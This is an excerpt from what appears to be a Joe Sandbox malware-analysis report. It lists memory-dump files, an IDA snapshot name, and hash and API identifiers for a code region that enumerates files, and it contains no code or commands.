                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: 481e201c14f0cd3fb7995d8ce1506227d2f48c71083194501e0a4ff7421a1c70
                                        • Instruction ID: 5780386f0087d4b7ad358bba6dc61c76c84d4197c5fd055722b0e8f2c852522c
                                        • Opcode Fuzzy Hash: 481e201c14f0cd3fb7995d8ce1506227d2f48c71083194501e0a4ff7421a1c70
                                        • Instruction Fuzzy Hash: 7921887AD0020CABC754FBB0DC86EE9337CA754700F04456CB659A6181EE75AACCDBA2